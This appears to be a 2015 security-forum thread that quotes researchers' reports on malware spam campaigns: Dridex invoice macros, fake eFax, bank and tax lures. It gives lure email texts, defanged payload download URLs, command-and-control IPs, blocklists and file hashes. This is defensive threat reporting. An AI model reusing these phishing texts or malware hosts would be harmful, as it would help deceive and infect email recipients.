8 Apr 2015 - "This -Dridex- spam takes a slightly different approach from other recent ones. Instead of -attaching- a malicious Office document, it downloads it from a compromised server instead. The example I saw read:
From: Mitchel Levy
Date: 8 April 2015 at 13:45
Subject: Invoice from MOTHERCARE
Your latest invoice is now available for download. We kindly advise you to pay the invoice in time.
Download your invoice here.
Thanks for attention. We appreciate your business.
If you have any queries, please do not hesitate to contact us.
Mitchel Levy, MOTHERCARE
The link in the email has an address using the domain afinanceei .com plus a subdomain based on the recipients email address. It also has the recipients email address embedded in the URL, for example: http ://victimbfe .afinanceei .com/victim@ victim .domain/
This is hosted on 31.24.30.12 (Granat Studio / Tomgate LLC, Russia) and it leads to a landing page that looks like this:
> https://4.bp.blogspot.com/-vUPtkxCCOGs/VSUoF2z9iSI/AAAAAAAAGeI/y_3wZi6iXMo/s1600/dridex-landing.png
... The link in the email downloads a file from:
http ://31.24.30.12 /api/Invoice.xls
At the moment the download server seems very unstable and is generating a lot of 500 errors. Incidentally, http ://31.24.30.12 /api/ shows a -fake- page pretending to be from Australian retailer Kogan:
> https://4.bp.blogspot.com/-Lp2QSnPComc/VSUsA5UN8PI/AAAAAAAAGeU/Hf7-6GPdBQo/s1600/fake-kogan.png
As you might guess, Invoice.xls contains a malicious macro... but the real action is some data hidden in the spreadsheet itself... it instructs the computer to download a malicious binary from:
http ://46.30.43.102 /cves/kase.jpg
This is saved as %TEMP%\dfsdfff.exe. Unsurprisingly, 46.30.43.102 is another Russian IP, this time EuroByte LLC. This binary has a VirusTotal detection rate of 6/57*. Automated analysis tools... show it communicating with the following IPs:
109.74.146.18 (VNET a.s., Bulgaria)
176.81.92.142 (Telefonica, Spain)
147.96.6.154 (Universidad Complutense De Madrid, Spain)
199.201.121.169 (Synaptica, Canada)
210.205.126.189 (Nowonwoman, Korea)
37.58.49.37 (Leaseweb, Germany)
87.117.229.29 (iomart, UK)
108.61.189.99 (Choopa LLC, US)
116.75.106.118 (Hathway, India)
107.191.46.222 (Choopa LLC, Canada)
In addition there are some Akamai IPs which look benign...
184.25.56.212
184.25.56.205
2.22.234.90
According to this Malwr report it drops several files including a malicious Dridex DLL which is the same one found in this attack:
> http://blog.dynamoo.com/2015/04/malware-spam-two-unpaid-invoices-wayne.html
Recommended blocklist:
109.74.146.18
176.81.92.142
147.96.6.154
199.201.121.169
210.205.126.189
37.58.49.37
87.117.229.29
108.61.189.99
116.75.106.118
107.191.46.222
46.30.43.102
31.24.30.12
MD5s:
e8cd8be37e30c9ad869136534f358fc5
671c65cedc8642adf70ada3f74d5da19
a4af11437798b7de5a0884623ed42478 "
* https://www.virustotal.com/en/file/b1e7e4d11ded1c5c14c5f28fcbf2750e5492f9ce5bd5de461b026ff6d63d0b5c/analysis/1428499086/
:fear::fear: :mad:
AplusWebMaster
2015-04-09, 13:07
FYI...
Fake 'Credit card transaction' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/credit-card-transaction-royal-wholesale-electric-word-doc-or-excel-xls-spreadsheet-malware/
9 Apr 2015 - "'Credit card transaction' pretending to come from Matthews, Tina <tina@ royalcarson .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/Credit-card-transaction.png
9 April 2015: 20150326094147512.doc - Current Virus total detections: 0/56*
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/52739a3668ff000d77093989c0f7f91b20de43926df7d90c254d7fb57cfbfdf7/analysis/1428569272/
- http://blog.dynamoo.com/2015/04/malware-spam-matthews-tina.html
9 Apr 2015
"...Tina Matthews
... Recommended blocklist:
91.230.60.219
66.110.179.66
176.108.1.17
202.44.54.5
87.236.215.103
128.199.203.165
128.135.197.30
185.35.77.160
95.163.121.0/24 ..."
___
Fake 'sorry you had a problem' SPAM – malware
- http://myonlinesecurity.co.uk/were-sorry-you-had-a-problem-with-your-purchase-malware/
9 Apr 2015 - "'We’re sorry you had a problem with your purchase' coming from random email addresses with a zip attachment is another one from the current bot runs... There are lots of different subjects with this malware spam run today. They include:
we’re issuing you a refund
a full refund
We’re sorry you had a problem with your purchase
The refund include original shipping
a payment reminder
RE: direct debit payment
direct debit payment
invoice
NEW Payment reminder ...
The email looks like:
'We issued you a full refund of 161.18 on Apr 09, 2015 The refund includes the purchase price plus original shipping.
Decision:
This case has been decided in your favor.
We’re sorry you had a problem with your purchase, and we’re issuing you a refund for this case.'
-Or-
'Hello, Payment Reminder: your invoice 62169289 dated 07.04.2015 in the amount 573.96'
All the emails have different amounts and various dates. The attachment names vary. So far I have seen refund_shipping_DOC.xml.exe and invoice.92004711.2015.04.08.doc.exe ...
9 April 2015: refund_shipping_DOC.xml.zip: Extracts to: refund_shipping_DOC.xml.exe
Current Virus total detections: 1/57* - This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/0942c34910e5fd1fd24fbae079a5f86796be5e65ccbd3673bde08140ab6571e6/analysis/1428567172/
... Behavioural information
UDP communications
23.101.187.68: https://www.virustotal.com/en/ip-address/23.101.187.68/information/
___
Fake 'Trade Confirmation' SPAM – PDF malware
- http://myonlinesecurity.co.uk/your-trade-confirmations-are-available-fake-pdf-malware/
9 Apr 2015 - "'Your Trade Confirmation(s) are Available' pretending to come from noreply@ masteryconnect .com with a zip attachment is another one from the current bot runs... The email looks like:
Please review the attached RFI, Submittal cheatsheet – this update reflects latest changes from RVA.
9 April 2015 : view kklvyg.zip: Extracts to: view.exe
Current Virus total detections: 2/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e064af96c07f2e5bfe726e24285df34e9c3400e1a52f00a9fd6f81cfec422012/analysis/1428583433/
... Behavioural information
UDP communications
23.102.23.44: https://www.virustotal.com/en/ip-address/23.102.23.44/information/
___
Fake 'Mail Out Report' SPAM – PDF malware
- http://myonlinesecurity.co.uk/mail-out-report-attached-fake-pdf-malware/
9 Apr 2015 - "'Mail Out Report Attached' pretending to come from Alert ARC Reports <zen179397@ zen .co .uk> with a zip attachment is another one from the current bot runs... The email looks like:
From Securitas, please do not reply to this e-mail as it is auto generated.
For any problems please e-mail derry.andrews@ securitas .co .uk
9 April 2015: Q100219366_Mail Out Report.zip: Extracts to: Q100219366_Mail Out Report.exe
Current Virus total detections: 1/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/045317ab6b4f1559fd485c7d189f791703a03c60744235af4af67ad3a6fe37eb/analysis/1428580032/
... Behavioural information
TCP connections
216.146.38.70: https://www.virustotal.com/en/ip-address/216.146.38.70/information/
141.105.141.87: https://www.virustotal.com/en/ip-address/141.105.141.87/information/
208.91.198.171: https://www.virustotal.com/en/ip-address/208.91.198.171/information/
UDP communications
23.101.187.68: https://www.virustotal.com/en/ip-address/23.101.187.68/information/
___
Fake 'Voicemail' SPAM – wav malware
- http://myonlinesecurity.co.uk/voipfone-voicemail-new-message-in-mailbox-301200-fake-wav-malware/
9 Apr 2015 - "'New message in mailbox 301***200' pretending to come from Voipfone Voicemail <voicemail@ voipfone .co .uk> with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/New-message-in-mailbox..png
9 April 2015: msg0005.wav.zip : Extracts to: msg0005.wav.exe
Current Virus total detections: 2/47* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav ( voice) file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/8ad0b4f3e284974fb3f8c511a37c7728d958924d2e8a405561532dfd95cf3186/analysis/1428582133/
... Behavioural information
UDP communications
23.99.222.162: https://www.virustotal.com/en/ip-address/23.99.222.162/information/
___
Fake 'incoming wire' – PDF malware
- http://myonlinesecurity.co.uk/metro-bank-unknown-incoming-wire-fake-pdf-malware/
9 Apr 2015 - "'Unknown incoming wire pretending to come from random names @metrobankonline .co.uk with a zip attachment is another one from the current bot runs... The email looks like:
The banking activity with today’s posting date shows Electronic Fund Transfer (EFT) that has been received. Our bank has noted the following information:
EFT Amount: 60,200.00 GBP
Remitted From: SSA TREAS 310 MISC PAY
Designated for: UNKNOWN
Please download and open attachment with full imformation about this Electronic Fund Transfer payment.
If you confirm that it belongs to your agency or department, please email back or give us a call. Then, our office needs to receive a completed General Deposit no later than 10:00 a.m. tomorrow.
Note: If these funds cannot be identified or if no one claims this EFT, we are required to process the return of this EFT by 10:00, April 09, 2015.
Thank you...
9 April 2015: electronic_fund_transfer.zip: Extracts to: electronic_fund_transfer.exe
Current Virus total detections: 3/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/89f328f73c4706174bfe3b2f0ba7b92fc1aa08042aeb5a5e3c81961924ad901e/analysis/1428584776/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
141.105.141.87: https://www.virustotal.com/en/ip-address/141.105.141.87/information/
149.255.58.7: https://www.virustotal.com/en/ip-address/149.255.58.7/information/
UDP communications
23.102.23.44: https://www.virustotal.com/en/ip-address/23.102.23.44/information/
___
Fake 'disneyinteractive' SPAM - PDF malware
- http://myonlinesecurity.co.uk/disneyinteractive-com-yearly-report-fake-pdf-malware/
9 Apr 2015 - "'yearly Report' pretending to come from apps@ e.disneyinteractive .com with a zip attachment is another one from the current bot runs... The email looks like:
Annual Report as an attachment
9 April 2015: Annual #Thu, 09 Apr 2015 18_14_02 +0100.cab: Extracts to: Report.exe
Current Virus total detections: 7/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/01a04e13d78822334b4fc91b1588a82175bf4b6c250691bb306012aa308fa0d3/analysis/1428598594/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
141.105.141.87: https://www.virustotal.com/en/ip-address/141.105.141.87/information/
104.156.59.86: https://www.virustotal.com/en/ip-address/104.156.59.86/information/
___
Namailu .com SPAM
- http://blog.dynamoo.com/2015/04/namailucom-spam.html
9 Apr 2015 - "This -spam- has been appearing in my inbox for several days now:
From: Shana Felton [9k7bf-2976014268@serv .craigslist .org]
Date: 9 April 2015 at 19:10
Subject: New commitment invitation - [redacted]
Sarah Smith
Hi Namailu User,
You have a commitment invitation from Sarah Smith. To view your commitment invitation please follow this link:
View Invitation
Copyright © 2015, Namailu Online Ltd...
Clicking through the link leads to https ://www .namailu .com/Smith.Sarah.206
> https://4.bp.blogspot.com/-fuQur_gywwY/VSbdwNDQS0I/AAAAAAAAGfk/us8dr9DE2xY/s1600/namailu1.jpg
Obviously we are led to believe that the girl in the picture is sending the message:
> https://3.bp.blogspot.com/-5e-oLshpuVQ/VSbeVCMWa1I/AAAAAAAAGfs/HNhF1UkHGJo/s1600/1425448322.png.jpg
Reverse image search comes up with no matches, unusually. Goodness knows how many people there are called "Sarah Smith" in New Zealand. Probably quite a lot.The spam messages come from a range of IPs that are also used to spam out promotional material for a site called dirtyemojis .com (using a redirector of dirtyemojis .ru). The spam is sent from a range of Chinese IP addresses... In each case the "From" address is -fake- ... A quick search of the body text of the message shows that it has been spammed out quite widely... this clueless approach does -not- bode well for a site that deals in highly personal data and my personal opinion would be to give this particular outfit a very wide berth."
___
Fake 'eFax'message SPAM - PDF malware
- http://myonlinesecurity.co.uk/efax-message-from-anna-2-pages-caller-id-1-920-530-9136-fake-pdf-malware/
8 Apr 2015 - "'eFax message from “Anna” – 2 page(s), Caller-ID: 1- 920-530-9136' pretending to come from eFax <no-replay@ efax .com> with a zip attachment is another one from the current bot runs... The email looks like:
Logo_eFax
JOIN THE eFax COMMUNITY
Facebook twitter google+ youtube
border1
You have a new eFax message. To view your message, see your fax attached or login here.
Fax Details
Caller Id:
Received:
Type:
Number of pages:
Reference #:
920-530-9136
Wed, 08 Apr 2015 18:43:01 +0100
Attached in pdf
2
atl_did9-SK6dCw_1X4W21v_3tk3rGIT
With eFax, did you know you can:
• Send faxes from your desktop or mobile device
• Sign and edit faxes with no printing required
• Send large files by email (up to 1 GB)
Learn more >>
Thank you for using eFax!
Sincerely,
The eFax Team
P.S. Want more solutions to help your business?
Test drive our cloud services from j2 Global with a Free Trial today!
border2
j2 Global | eFax | eVoice | FuseMail | Campaigner | KeepItSafe | OneBox
© 2015 j2 Cloud Services, Inc. All rights reserved.
eFax is a registered trademark of j2 Cloud Services, Inc.
This account is subject to the terms listed in the eFax Customer Agreement.
8 April 2015: SK6dCw 1X4W21v 3tk3rGIT.zip: Extracts to: chase.exe
Current Virus total detections: 5/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/9397a7bffd2c8041d2bea152ad531364eb4124e8b40280d3fc36efa1bf97ebd8/analysis/1428511349/
... Behavioural information
TCP connections
216.146.39.70: https://www.virustotal.com/en/ip-address/216.146.39.70/information/
141.105.141.87: https://www.virustotal.com/en/ip-address/141.105.141.87/information/
67.222.12.237: https://www.virustotal.com/en/ip-address/67.222.12.237/information/
109.237.134.22: https://www.virustotal.com/en/ip-address/109.237.134.22/information/
UDP communications
104.41.150.68: https://www.virustotal.com/en/ip-address/104.41.150.68/information/
___
Fake 'Chase Card For your account' SPAM – PDF malware
- http://myonlinesecurity.co.uk/chase-card-for-your-account-ending-fake-pdf-malware/
8 Apr 2015 - "'Chase Card For your account' ending pretending to come from Chase <dont@ alertsp .chase .com> with a zip attachment is another one from the current bot runs... Other subjects in this chase card spam malware run are:
Hi Customer
For your account ending ...
The email looks like:
If you are having trouble viewing this message, please click here. E-mail Security Information.
CHASE
GET ITEMIZED & ORGANIZED
1. Log on to www .chase .com/creditcards.
At the bottom of you statement page, click "year end summary" link.
View,print, or save your summary.
ACTIVATE ALERTS
GO PAPERLESS
Dear Customer,
For your credit card ending in: 0093Your 2015 Year End Summary is now attached and ready for you to view. If you have additional accounts that qualify for a year end summary, you will be notified shortly when they are available.
This year’s summary includes eight categories to provide detail about how you use your card. We hope you find this summary helpful as you prepare your taxes and set your budget for 2016.
See all your transactions by category:
Categories
Sincerely,
sig
Deb Walden
Executive Vice President
Customer Experience
Chase Card Services
spacer
GET YOUR FREE SUMMARY - GO NOW
8 April 2015: Chase_Chase Card_information.zip: Extracts to: Chase_Chase Card_information.exe
Current Virus total detections: 4/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected...."
* https://www.virustotal.com/en/file/adc576bf26d1ed401276b12c9d2ce043dd286308f433bffba511b91ef0ebacea/analysis/1428505049/
... Behavioural information
TCP connections
91.198.22.70: https://www.virustotal.com/en/ip-address/91.198.22.70/information/
141.105.141.87: https://www.virustotal.com/en/ip-address/141.105.141.87/information/
67.222.12.237: https://www.virustotal.com/en/ip-address/67.222.12.237/information/
109.237.134.22: https://www.virustotal.com/en/ip-address/109.237.134.22/information/
UDP communications
191.233.81.105: https://www.virustotal.com/en/ip-address/191.233.81.105/information/
:fear::fear: :mad:
AplusWebMaster
2015-04-10, 17:20
FYI...
Fake 'Invoice Payment Confirmation' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/webhosting-uk-invoice-payment-confirmation-word-doc-or-excel-xls-spreadsheet-malware/
10 Apr 2015 - "'Invoice Payment Confirmation' pretending to come from WEBHOSTING UK <billing@ webhosting .uk .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/Invoice-Payment-Confirmation.png
10 April 2015 : WHUK2009-160824.doc - Current Virus total detections: 4/57*
... which downloads Dridex from [DO NOT CLICK] architectureetenvironnement .ma/762/532 which is saved as %temp%\miron3.6.exe (virus total**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/bb69f9059c8d3d5443584ac6949714314a8e86ee9cf4932d44e91622f5f34211/analysis/1428669374/
** https://www.virustotal.com/en/file/7337c9fc8a90e2f8443a1e4feec967c936e8819c297ecf5789aa96c7f682c161/analysis/1428673121/
... Behavioural information
TCP connections
37.140.199.100: https://www.virustotal.com/en/ip-address/37.140.199.100/information/
90.84.59.66: https://www.virustotal.com/en/ip-address/90.84.59.66/information/
185.35.77.250: https://www.virustotal.com/en/ip-address/185.35.77.250/information/
94.23.173.233: https://www.virustotal.com/en/ip-address/94.23.173.233/information/
94.23.171.198: https://www.virustotal.com/en/ip-address/94.23.171.198/information/
87.236.215.151: https://www.virustotal.com/en/ip-address/87.236.215.151/information/
UDP communications
23.101.187.68: https://www.virustotal.com/en/ip-address/23.101.187.68/information/
___
Fake 'Receipt Request' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/mcmaster-carr-your-receipt-request-word-doc-or-excel-xls-spreadsheet-malware/
10 Apr 2015 - "'Your Receipt Request' pretending to come from McMaster-Carr <la.sales@ mcmaster .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Hi ,
I attached the receipts you requested.
Annette
10 April 2015 : Receipts.doc - Current Virus total detections: 4/57*
This is exactly the same malware as the other office macro malware spreading today WEBHOSTING UK Invoice Payment Confirmation* – word doc or excel xls spreadsheet malware..."
* http://myonlinesecurity.co.uk/webhosting-uk-invoice-payment-confirmation-word-doc-or-excel-xls-spreadsheet-malware/
:fear::fear: :mad:
AplusWebMaster
2015-04-12, 01:00
FYI...
VBS Malware tied to Attacks on French TV Station TV5Monde
- http://blog.trendmicro.com/trendlabs-security-intelligence/vbs-malware-tied-to-media-attacks/
Apr 11, 2015 - "... we found that VBS_KJWORM.SMA is observed in at least 12 countries in the past week, including South Africa and India... this malware is available in underground forums and can be used by anyone. This particular malware can be used as a backdoor into the affected system. In addition, the C&C server reportedly used in the attack has been tied to another backdoor, BKDR_BLADABINDI.C. Our investigation leads us to believe the actors behind KJWORM and BLADABINDI are the same. Further information from the Smart Protection Network suggests that other VBS malware variants are currently circulating in the wild. Four separate C&C servers (distinct from those used used by NJWORM). These different samples, in turn, are connected to previous NJRAT/JENXCUS attacks. NJRAT has been tied to DUNIHI attacks in the Latin American region... The massive cyber attack that hit the French TV5Monde television network this past April 9, according to reports, began at approximately 10:00 P.M. local time (4:00 P.M. Eastern time), when 11 of their channels went off the air... TV5Monde’s website, company email, as well as their social media outlets came under attack. The network’s Facebook page was used to post propaganda messages allegedly from the Islamic State (ISIS). One of the network’s Twitter accounts was also accessed and posted messages against the United States and France, as well as issued threats to families of French soldiers. Copies of French soldiers’ IDs and passports were also published. It should be noted that the technical background of this attack is not yet clear. However, the -RAT- generator is currently available in several hacker forums and can be used by any threat actor... one does not need a lot of technical skill to use it..."
:fear::fear:
AplusWebMaster
2015-04-13, 17:57
FYI...
Fake 'tax return' SPAM – PDF malware
- http://myonlinesecurity.co.uk/your-tax-return-was-incorrectly-filled-out-fake-pdf-malware/
13 Apr 2015 - "'Your tax return was incorrectly filled out' pretending to come from user <chak.noris@ tax .gov> with a zip attachment is another one from the current bot runs... The email looks like:
Attention: Owner/ Manager
We would like to inform you that you have made mistakes while completing
the last tax form application (ID: 0054206036751) .
Please follow the advice of our tax specialists:
http ://clinicaasera .org/FAX.MESSAGE-DATA-STORAGE/incoming-new_message.html
Please amend the mistakes and send the corrected tax return to your tax
agent as soon as possible.
Yours sincerely
13 April 2015: new-message.zip: Extracts to: new-message.exe
Current Virus total detections: 2/57* . This 'Your tax return was incorrectly filled out' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/0116a687f1f10b70480274bd131bc98214686db234654fd0d0abb52903d54207/analysis/1428931605/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
5.141.22.43: https://www.virustotal.com/en/ip-address/5.141.22.43/information/
217.160.235.239: https://www.virustotal.com/en/ip-address/217.160.235.239/information/
UDP communications
104.41.150.68: https://www.virustotal.com/en/ip-address/104.41.150.68/information/
___
Fake 'inTuit Payroll' SPAM - PDF malware
- http://myonlinesecurity.co.uk/payroll-received-by-intuit-fake-pdf-malware/
13 Apr 2015 - "'Payroll Received by Intuit' pretending to come from Intuit Payroll Services <IntuitPayrollServices@ payrollservices .intuit .com> with a zip attachment is another one from the current bot runs... The email looks like:
Dear, info
We received your payroll on April 13, 2015 at 09:06 AM EST.
Attached is a copy of your Remittance. Please click on the attachment in order to view it.
Please note the deadlines and status instructions below:
If your payroll is received BEFORE 5 p.m., your Direct Deposit employees will be paid two (2) banking days from the date received or on your paycheck date, whichever is later.
If your payroll is received AFTER 5 p.m., your employees will be paid three (3) banking days from the date received or on your paycheck date, whichever is later.
YOUR BANK ACCOUNT WILL BE DEBITED THE DAY BEFORE YOUR CHECKDATE.
Funds are typically withdrawn before normal banking hours so please make sure you have sufficient funds available by 12 a.m. on the date funds are to be withdrawn.
Intuit must receive your payroll by 5 p.m., two banking days before your paycheck date or your employees will not be paid on time.
Intuit does not process payrolls on weekends or federal banking holidays. A list of federal banking holidays can be viewed at the Federal Reserve website.
Thank you for your business.
Sincerely,
Intuit Payroll Services ...
13 April 2015: payroll_report_08222014.zip: Extracts to: payroll_report_08222014.exe
Current Virus total detections: 6/57* . This 'Payroll Received by Intuit' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/90c6b8dc66b66de762c42bcf0df9abe3378ba11c10f2d904acb673f40e2891be/analysis/1428945209/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
27.121.64.159: https://www.virustotal.com/en/ip-address/27.121.64.159/information/
5.141.22.43: https://www.virustotal.com/en/ip-address/5.141.22.43/information/
UDP communications
23.102.23.44: https://www.virustotal.com/en/ip-address/23.102.23.44/information/
___
Another '419' Spam/Scam
- https://blog.malwarebytes.org/fraud-scam/2015/04/international-reconciliation-and-logistics-vault-419-spam/
Apr 13, 2015 - "Every now and then a 419 scammer dredges up an old scam mail, gives it a bit of spit and polish then sends it back out into the wild. The “International Reconciliation and Logistics Vault” has been a subject for 419 attempts* for a number of years now, though the typical format of these missives tends to be more like this one. Indeed, here it comes again:
> https://blog.malwarebytes.org/wp-content/uploads/2015/04/logisticsspam.jpg
... Should you receive this one, feel free to send it right to the trash..."
* https://en.wikipedia.org/wiki/419_scams
:fear::fear: :mad:
AplusWebMaster
2015-04-14, 12:24
FYI...
Fake 'Invoice' SPAM - malicious attachment
- http://blog.dynamoo.com/2015/04/malware-spam-kairen-varker.html
15 Apr 2015 - "This fake invoice has a malicious attachment:
From: Kairen Varker [mailto:kvarker@ notifications .kashflow .com] On Behalf Of Kairen Varker
Sent: Tuesday, April 14, 2015 9:26 AM
Subject: Invoice from
I have made the changes need and the site is now mobile ready . Invoice is attached
In this case the attachment is called Invoice-83230.xls which is currently undetected* by AV vendors. It contains this malicious macro... which downloads a component from the following location (although there are probably more than this):
http ://925balibeads .com/94/053.exe
This is saved as %TEMP%\stepk1.5a.exe and has a VirusTotal detection rate of 3/57**. Automated analysis tools... show the malware phoning home to:
78.24.218.186 (TheFirst-RU, Russia)
176.67.160.187 (UK2, UK)
87.236.215.151 (OneGbits, Lithuania)
154.69.104.137 (Sandton Telkom, South Africa)
107.191.46.222 (Vultr Holdings / Choopa LLC, Canada)
94.23.171.198 (OVH, Czech Republic)
74.119.194.18 (RuWeb Corp, US)
37.140.199.100 (Reg.Ru Hosting, RUssia)
89.28.83.228 (StarNet SRL, Moldova)
The Malwr report shows that among other files it drops a malicious Dridex DLL with a detection rate of 2/57***.
Recommended blocklist:
78.24.218.186
184.25.56.188
176.67.160.187
87.236.215.151
154.69.104.137
107.191.46.222
94.23.171.198
74.119.194.18
37.140.199.100
89.28.83.228
MD5s:
e46dcc4a49547b547f357a948337b929
1748fc9c5c0587373bf15a6bda380543
1e010195d2e5f6096095078482624995 "
* https://www.virustotal.com/en/file/a901c12b6733909b6fd69a6865c5746d3ea8ec07ac24450815b5247edfb2aa71/analysis/1428998998/
** https://www.virustotal.com/en/file/68aadcf93a28f2427cf27fb70b457d70ec3fed48b34df06c429cd1f530102f67/analysis/1428998395/
*** https://www.virustotal.com/en/file/8f425a0ec6ff3d28685f8b618b01ef5442ff5310f4deaf8760408c1eea77d9ce/analysis/1428999812/
- http://myonlinesecurity.co.uk/invoice-from-kairen-varker-word-doc-or-excel-xls-spreadsheet-malware/
14 Apr 2015
> https://www.virustotal.com/en/file/bfde68ed32bcbdcf2cc3a452f860bf62bb5c7344e032cc2ed8093f9844d7cae9/analysis/1428997086/
___
Fake 'Account reconcilation' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/account-reconcilation-statement-from-random-company-random-characters-word-doc-or-excel-xls-spreadsheet-malware/
14 Apr 2015 - "'Account reconcilation statement' from [random company] [random characters] – coming from random names and email addresses with a zip file attachment that extracts to a malicious word doc and an image of a sales chart is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/Account-reconcilation-statement-from_version1.png
... Where you can see the name of the alleged sender matches the name in the body of the email and the random characters in the subject match the attachment zip name. Once you extract the content of the zip you get a folder on the computer that is simply named as a number 2 or 8 or 9 etc. opening the folder gives you a malicious word doc and an image of a sales chart like one of these, that are intended to help convince you of the genuine nature of the word doc and entice you to open it and get infected:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/confirmation-images.jpg
...
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/Visual-graph.jpg
...
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/sales-cmp.jpg
... 4 April 2015 : documentation.doc / vs74_stats.doc / cmp static.doc
Current Virus total detections: 0/56* | 0/56** | 0/56*** . So far I have examined 3 different versions of this malware... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/9a39c3a3d112b568690a79c484b8a6731c1edf77d1f3a504754098dfbf0d8078/analysis/1429005163/
** https://www.virustotal.com/en/file/d935dac49e0811e7a7f310c75cfe4f220ea738b9e74295dca73e5aeca9693624/analysis/1429005436/
*** https://www.virustotal.com/en/file/d935dac49e0811e7a7f310c75cfe4f220ea738b9e74295dca73e5aeca9693624/analysis/1429005436/
___
Fake 'HM Revenue' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/cis-online-submission-received-by-hm-revenue-and-customs-fake-pdf-malware/
14 Apr 2015 - "'CIS Online submission received by HM Revenue and Customs' pretending to come from helpdesk@ ir-efile .gov .uk with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/CIS-Online-submission-received-by-HM-Revenue-and-Customs.png
14 April 2015: Returns_Report.zip: Extracts to: Returns_Report.exe
Current Virus total detections: 5/57* . This 'CIS Online submission received by HM Revenue and Customs' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected...."
* https://www.virustotal.com/en/file/84473a0a5dd1db8adee8bb6520e1da44576cb22090ed74d97edc019c984c3acb/analysis/1429017381/
___
Fake 'Credit Release' SPAM - PDF malware
- http://myonlinesecurity.co.uk/re-credit-release-request-hsbc-com-fake-pdf-malware/
14 Apr 2015 - "'RE: Credit Release Request' pretending to come from Bank <tim.redmon@ hsbc .com> ( random names @ hsbc .com) with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/RE-Credit-Release-Request.png
14 April 2015: banP_.zip: Extracts to: banк.exe
Current Virus total detections: 6/57* . This RE: Credit Release Request is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/197351ef19d0d582bf23e415e6837c38a0294bc58080cb8a3b55eb14d447456d/analysis/1429017978/
... Behavioural information
TCP connections
83.219.139.124: https://www.virustotal.com/en/ip-address/83.219.139.124/information/
90.84.60.97: https://www.virustotal.com/en/ip-address/90.84.60.97/information/
5.141.22.43: https://www.virustotal.com/en/ip-address/5.141.22.43/information/
___
Fake 'Auto Invoice' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/invoice-bi653133-dorset-auto-spares-blandford-autonetplus-co-uk-word-doc-or-excel-xls-spreadsheet-malware/
14 Apr 2015 - "'INVOICE BI653133' pretending to come from websales(random number)@autonetplus .co .uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Account: 1164
From: DORSET AUTO SPARES BLANDFORD
The following are attached to this email:
IBI653133.XLS
14 April 2015 : IBI653133.XLS
Current Virus total detections: 0/56* ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/e7fff733950f13a4509ef917d259a27d999a5d648dff66498924d0d58985cb6f/analysis/1429017301/
___
CoinVault ransomware: Retrieve data without paying the criminals
- http://net-security.org/malware_news.php?id=3017
